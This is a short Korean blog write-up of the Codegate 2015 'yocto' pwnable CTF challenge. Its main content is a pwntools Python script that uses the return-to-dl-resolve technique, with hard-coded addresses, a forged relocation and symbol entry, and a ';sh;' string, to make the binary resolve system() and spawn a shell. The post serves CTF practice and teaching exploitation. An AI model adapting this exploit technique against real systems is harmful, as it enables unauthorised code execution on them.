Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

codegate 2015 yocto 본문

Security/Pwnable

codegate 2015 yocto

Cdor1 2016. 9. 15. 03:45

후기 : RDTL이라는 새로운 기법을 터득했다!

※jinmo123(진용휘), pwn3r(권혁)님 문서 참조



from pwn import *

buf = 0x080495c0    # .bss
strtab = 0x80481fc  # Save string
symtab = 0x804818c  # Real function offset
jmprel = 0x8048270  # Relocation table
dynamic_linker = 0x80482a0
target = 0x8049610  # read
system = 'system\x00'

r_addr = buf + 20 # read_reloc addr
sys_addr = r_addr + 8 # system addr
r_offset = r_addr - jmprel # read_reloc offset
string = sys_addr - strtab # string offset

payload = '.' + str(r_offset) + '.' + str(dynamic_linker)
payload += ';sh;'
payload += 'A'*(20 - len(payload))

payload += p32(target)
payload += p32(0x14607)
payload += system
payload += 'A'*9
payload += p32(string)

print payload

'Security > Pwnable' 카테고리의 다른 글

Codegate 2015 bookstore  (0) 2016.09.21
Defcon23 Quals r0pbaby  (0) 2016.09.19
Codegate 2014 Quals minibomb  (0) 2016.09.11
Plaid CTF 2015 ebp  (0) 2016.09.10
Plaid CTF 2014 ezhp  (0) 2016.09.10
공유하기 링크
'Security/Pwnable' Related Articles more
Comments